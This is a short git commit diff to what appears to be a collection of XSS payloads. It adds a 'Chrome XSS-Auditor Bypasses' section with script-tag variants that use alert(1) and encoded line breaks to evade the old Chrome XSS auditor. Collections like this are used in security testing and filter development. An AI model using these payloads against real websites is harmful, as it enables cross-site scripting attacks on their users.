Create "Chrome XSS-Auditor Bypasses" section.

This commit is contained in:
EdOverflow 2017-08-10 09:47:39 -04:00
parent a4a9136630
commit c9de842499

View file

@ -12,12 +12,16 @@
<script src="data:,alert(1)%250A-->
```
**Chrome XSS-Auditor Bypass**
**Other Chrome XSS-Auditor Bypasses**
```html
<script>alert(1)</script
```
```html
<script>alert(1)%0d%0a-->%09</script
```
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
```